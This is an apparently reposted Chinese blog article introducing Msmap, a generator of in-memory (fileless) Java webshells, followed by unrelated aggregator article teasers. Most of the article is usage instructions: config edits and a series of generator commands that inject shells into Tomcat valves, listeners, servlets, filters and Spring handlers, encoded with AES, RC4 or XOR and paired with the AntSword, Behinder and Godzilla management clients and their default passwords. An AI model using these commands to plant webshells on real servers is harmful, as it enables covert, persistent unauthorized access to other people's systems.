Msmap ：一个内存 WebShell 生成器

news/2025/2/21 3:18:04/文章来源:https://www.cnblogs.com/o-O-oO/p/18723041

Msmap 是一个内存 WebShell 生成器。兼容各种容器、组件、编码器、WebShell/代理/杀手和管理客户端。

用法

git clone git@github.com:hosch3n/msmap.git
cd msmap
python generator.py

编辑config/environment.py

# Auto Compile
auto_build = True# Base64 Encode Class File
b64_class = True# Generate Script File
generate_script = True# Compiler Absolute Path
java_compiler_path = r"~/jdk1.6.0_04/bin/javac"
dotnet_compiler_path = r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"

编辑gist/java/container/tomcat/servlet.py

// Servlet Path Pattern
private static String pattern = "*.xml";

如果在 WsFilter 中使用加密编码器，则密码需要与路径相同（例如/passwd）

gist/java/container/jdk/javax.pywithlib/servlet-api.jar可以根据目标容器进行替换。

pip3 install pyperclip支持自动复制到剪贴板。

Example

CMD / SH

Command with Base64 Encoder | Inject Tomcat Valve

python generator.py Java Tomcat Valve Base64 CMD passwd

AntSword

Type JSP with default Encoder | Inject Tomcat Valve

python generator.py Java Tomcat Valve RAW AntSword passwd

Type JSP with aes_128_ecb_pkcs7_padding_md5 Encoder | Inject Tomcat Listener

python generator.py Java Tomcat Listener AES128 AntSword passwd

Type JSP with rc_4_sha256 Encoder | Inject Tomcat Servlet

python generator.py Java Tomcat Servlet RC4 AntSword passwd

Type JSP with xor_md5 Encoder | AgentFiless Inject HttpServlet

python generator.py Java JDK JavaX XOR AntSword passwd

Type JSPJS with aes_128_ecb_pkcs7_padding_md5 Encoder | Inject Tomcat WsFilter

python generator.py Java Tomcat WsFilter AES128 JSPJS passwd

Type JSPJS with xor_md5 Encoder | Inject Spring Handler


python generator.py Java Spring Handler XOR JSPJS passwd

Behinder

Type default_aes | Inject Tomcat Valve

python generator.py Java Tomcat Valve AES128 Behinder rebeyond

Type default_xor_base64 | Inject Spring Interceptor

python generator.py Java Spring Interceptor XOR Behinder rebeyond

Godzilla

Type JAVA_AES_BASE64 | Inject Tomcat Valve

python generator.py Java Tomcat Valve AES128 Godzilla superidol

Type JAVA_AES_BASE64 | AgentFiless Inject HttpServlet

python generator.py Java JDK JavaX AES128 Godzilla superidol

Type JAVA_AES_BASE64 | Inject Spring Handler

python generator.py Java Spring Handler AES128 Godzilla superidol

项目🔗

https://github.com/hosch3n/msmap

如有侵权，请联系删除

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.hqwc.cn/news/886570.html

如若内容造成侵权/违法违规/事实不符，请联系编程知识网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

【一文解读】内外网文件摆渡系统详解：跨网传输与数据安全保障

在数字化时代，企业在内外网之间传输文件已经成为日常运作的一部分。然而，如何确保在不同网络环境下高效、安全地进行文件传输，成为许多企业面临的重要挑战。内外网文件摆渡系统应运而生，成为解决跨网数据传输瓶颈和保障数据安全的关键工具。本文将深入解析内外网文件摆渡系…

SM2密码算法使用规范（GB/T 35276）学习

STATA 矩阵处理

传统ftp无法满足高性能传输需求，如何寻找替代ftp的技术？

面对现在数据量的激增和网络安全威胁的不断演变，许多传统企业在用传统的FTP系统都面对着许多的安全和传输问题，企业面临的挑战是如何在保障数据安全的同时，提高文件传输的效率，因此原FTP系统已经逐步无法满足现代企业的需求。今天主要了解下企业需要替代FTP的原因，以及如何…

15852.1采用分组密码的机制-填充方式学习

只需简单5步，Ansible脚本自动搭建AlwaysOn集群（已测试通过，可实际运行）

只需简单5步，Ansible脚本自动搭建AlwaysOn集群（已测试通过，可实际运行）之前已经介绍过这套脚本，请看下面↓ 一分钟搞定！CentOS 7.9上用Ansible自动化部署SQL Server 2019 注意：这套ansible脚本不支持RHEL 7.X 和CentOS7.X系统! 这套ansible脚本不支持RHEL 7.X …

[AI/计算机硬件] 部署、训练AI大模型的显卡采购指南 [转]

序截至2025年，全球主流的AI大模型满血版的参数量均已突破百亿级，算力需求正以指数级飙升。特别是 DeepSeek 公司旗下的 R1 系列模型的问世，推动了很多中小企业部署私有化模型的需求。然而，面对动辄数十万上百万元的GPU采购成本，选错一块显卡可能让企业付出高昂的试错代价。…

清华DeepSeek手册第Ⅳ版《DeepSeek﹢智灵DeepResearch 让科研像聊天一样简单》

在数字化浪潮汹涌澎湃的当下，大模型如同一颗璀璨新星，强势崛起并迅速成为科技领域的焦点。从最初的理论探索到如今在各个行业的广泛应用，大模型正以惊人的速度重塑着我们的生活与工作模式。它的出现不仅是人工智能技术发展的重大突破，更是推动经济增长、提升社会治理效能、…

[Vite] Code Splitting Vite

Code Splitting 打包构建中的代码拆分（Code Splitting）是一种优化技术，它将应用程序的代码拆分成多个小块（chunks），并在需要时按需加载这些代码块。这种技术的目的是提高应用程序的性能和用户体验，主要有以下几个原因：减少初始加载时间当应用程序的代码被打包成一个单…

ArrayBlockingQueue的poll方法底层原理

一、ArrayBlockingQueue的poll方法底层原理 ArrayBlockingQueue 是 Java 并发包 (java.util.concurrent) 中的一个基于数组实现的有界阻塞队列。它的 poll() 方法是用于从队列中移除并返回队首元素的核心方法之一。与 take() 方法不同，poll() 方法在队列为空时不会阻塞，而是立…

线程生命周期

java web前台技术的初步学习

今日学习了Java Web 基本开发技术前台技术，分为HTML和CSS HTML 是构建网页结构的基础，用于定义网页中的各种元素，如标题、段落、图片、链接、表格等。通过不同的标签组合，可以搭建出网页的基本框架。常用标签示例 html示例页面这是一级标题这是一个段落。访问示例网站CSS …

Msmap ：一个内存 WebShell 生成器

用法

Example

CMD / SH

AntSword

Behinder

Godzilla

项目🔗

相关文章